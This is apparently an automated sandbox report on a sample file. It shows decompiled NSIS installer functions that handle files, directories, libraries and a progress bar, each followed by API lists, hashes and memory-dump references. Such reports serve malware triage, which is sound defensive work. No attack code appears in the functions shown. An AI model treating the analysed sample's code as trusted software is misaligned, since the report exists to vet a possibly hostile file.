                                                                                                                                                                                                  • Opcode ID: 2e9692695d224f2209394ba8483a10a7673f1574e580eee3bfcb80b1a84d84da
                                                                                                                                                                                                  • Instruction ID: 7d59cd0ba42eeb9d64297a1bfc0940e3ae1e5cc226c4bbb5031ea1960038836b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e9692695d224f2209394ba8483a10a7673f1574e580eee3bfcb80b1a84d84da
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8811D031904510EBCF30AFA5CD4599E36A0EF15329B28493BFA45B22F1DB3E8D819A5D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405DC5 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                                                                  			E00405DC5(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E004063E8(0x45a730, _a4);
				_t21 = E00405D68(0x45a730);
				if(_t21 != 0) {
					E0040667C(_t21);
					if(( *0x47025c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x45a730 >> 1;
						while(1) {
							_t11 = lstrlenW(0x45a730);
							_push(0x45a730);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040672B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405D09(0x45a730);
								continue;
							} else {
								goto L1;
							}
						}
						E00405CBD();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                                                                                                                  0x00405dd1
                                                                                                                                                                                                  0x00405ddc
                                                                                                                                                                                                  0x00405de0
                                                                                                                                                                                                  0x00405de7
                                                                                                                                                                                                  0x00405df3
                                                                                                                                                                                                  0x00405e03
                                                                                                                                                                                                  0x00405e05
                                                                                                                                                                                                  0x00405e1d
                                                                                                                                                                                                  0x00405e1e
                                                                                                                                                                                                  0x00405e25
                                                                                                                                                                                                  0x00405e26
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405e09
                                                                                                                                                                                                  0x00405e10
                                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405e10
                                                                                                                                                                                                  0x00405e28
                                                                                                                                                                                                  0x00405e2e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405e3c
                                                                                                                                                                                                  0x00405df5
                                                                                                                                                                                                  0x00405dfb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405dfb
                                                                                                                                                                                                  0x00405de2
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,746AF560,00405B1A,?,004D5000,746AF560,00000000), ref: 00405D76
                                                                                                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                  • lstrlenW.KERNEL32(0045A730,00000000,0045A730,0045A730,004D5000,?,746AF560,00405B1A,?,004D5000,746AF560,00000000), ref: 00405E1E
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(0045A730,0045A730,0045A730,0045A730,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,746AF560,00405B1A,?,004D5000,746AF560), ref: 00405E2E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3248276644-0
                                                                                                                                                                                                  • Opcode ID: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                  • Instruction ID: 388cf340d0c034ef08ff27084220079457182ac4682ba574f5a4b5e3d5e6accd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFF0F43A005E1116D62233364D09BEF0948CE82314B1A853BFC91B22D2DB3C8A539DFE
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x470290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x46822c =  *0x46822c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x46822c, 0x7530,  *0x468214), 0);
					}
				}
				return 0;
			}











                                                                                                                                                                                                  0x0040138a
                                                                                                                                                                                                  0x004013fa
                                                                                                                                                                                                  0x0040139b
                                                                                                                                                                                                  0x004013a0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004013a2
                                                                                                                                                                                                  0x004013a3
                                                                                                                                                                                                  0x004013ad
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401404
                                                                                                                                                                                                  0x004013b0
                                                                                                                                                                                                  0x004013b7
                                                                                                                                                                                                  0x004013bd
                                                                                                                                                                                                  0x004013be
                                                                                                                                                                                                  0x004013c0
                                                                                                                                                                                                  0x004013c2
                                                                                                                                                                                                  0x004013b9
                                                                                                                                                                                                  0x004013b9
                                                                                                                                                                                                  0x004013ba
                                                                                                                                                                                                  0x004013ba
                                                                                                                                                                                                  0x004013c9
                                                                                                                                                                                                  0x004013cb
                                                                                                                                                                                                  0x004013f4
                                                                                                                                                                                                  0x004013f4
                                                                                                                                                                                                  0x004013c9
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                  • Opcode ID: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                  • Instruction ID: b0acf179c18152fd5568b60ba426e70b62ff0895eecaeb6bac654bfa50895d4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD012832620210DFE7195B789D18B2A3798E710718F10467FF955F62F1EA78CC429B4D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E004067C2(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E00406752(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                                                                                  0x004067ca
                                                                                                                                                                                                  0x004067cd
                                                                                                                                                                                                  0x004067d4
                                                                                                                                                                                                  0x004067dc
                                                                                                                                                                                                  0x004067e8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004067ef
                                                                                                                                                                                                  0x004067df
                                                                                                                                                                                                  0x004067e6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004067f7
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                    • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                    • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                    • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                                                                                  • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                  • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004039E6 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E004039E6() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					FindCloseChangeNotification(_t1); // executed
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403A43();
				_t4 = E00405AFA(_t11, 0x4d9000, 7); // executed
				return _t4;
			}







                                                                                                                                                                                                  0x004039e6
                                                                                                                                                                                                  0x004039f5
                                                                                                                                                                                                  0x004039f8
                                                                                                                                                                                                  0x004039fa
                                                                                                                                                                                                  0x004039fa
                                                                                                                                                                                                  0x00403a01
                                                                                                                                                                                                  0x00403a09
                                                                                                                                                                                                  0x00403a0c
                                                                                                                                                                                                  0x00403a0e
                                                                                                                                                                                                  0x00403a0e
                                                                                                                                                                                                  0x00403a0e
                                                                                                                                                                                                  0x00403a15
                                                                                                                                                                                                  0x00403a21
                                                                                                                                                                                                  0x00403a27

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(FFFFFFFF,746AFAA0,00403819,00000006,?,00000006,00000008,0000000A), ref: 004039F8
                                                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,746AFAA0,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A0C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$ChangeFindHandleNotification
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4069496961-0
                                                                                                                                                                                                  • Opcode ID: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                  • Instruction ID: cd813d42a02bf8c0cac85f8aec853e45aa6acae4c29e822381722b559998feb2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE08C35A4071496C520EF7CBD8D9853A286B813357208326F0BDF21F0C7389EA79EA9
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                  			E00405EDE(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                                                                  0x00405ee2
                                                                                                                                                                                                  0x00405eef
                                                                                                                                                                                                  0x00405f04
                                                                                                                                                                                                  0x00405f0a

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                                  • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                  • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405EB9 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00405EB9(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                                                                                                                                                                  0x00405ebe
                                                                                                                                                                                                  0x00405ec4
                                                                                                                                                                                                  0x00405ec9
                                                                                                                                                                                                  0x00405ed2
                                                                                                                                                                                                  0x00405ed2
                                                                                                                                                                                                  0x00405edb

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405ED2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                  • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                  • Instruction ID: 9f0be338fa0adf84d9e7c2e76c5bc37ea56a51acd28ddc8ab22a7b028afbcef4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13D01272504420AFC2502738EF0C89FBF95DB543717124B35FAE9A22F0CB304C568A98
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E0040599C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                                                                                  0x004059a2
                                                                                                                                                                                                  0x004059aa
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004059b0
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403498,004D5000,004D5000,004D5000,004D5000,746AFAA0,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                                                  • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                  • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401F06 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                                                  			E00401F06() {
				void* _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C41(_t15);
				E00405450(0xffffffeb, _t7);
				_t20 = E004059D1(_t19);
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E00406873(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E0040632F( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20); // executed
					FindCloseChangeNotification(); // executed
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}








                                                                                                                                                                                                  0x00401f0c
                                                                                                                                                                                                  0x00401f11
                                                                                                                                                                                                  0x00401f1c
                                                                                                                                                                                                  0x00401f20
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x00401f26
                                                                                                                                                                                                  0x00401f29
                                                                                                                                                                                                  0x00401f2c
                                                                                                                                                                                                  0x00401f34
                                                                                                                                                                                                  0x00401f43
                                                                                                                                                                                                  0x00401f45
                                                                                                                                                                                                  0x00401f45
                                                                                                                                                                                                  0x00401f36
                                                                                                                                                                                                  0x00401f3a
                                                                                                                                                                                                  0x00401f3a
                                                                                                                                                                                                  0x00401f34
                                                                                                                                                                                                  0x00401f4c
                                                                                                                                                                                                  0x00401f4d
                                                                                                                                                                                                  0x00401f4d
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
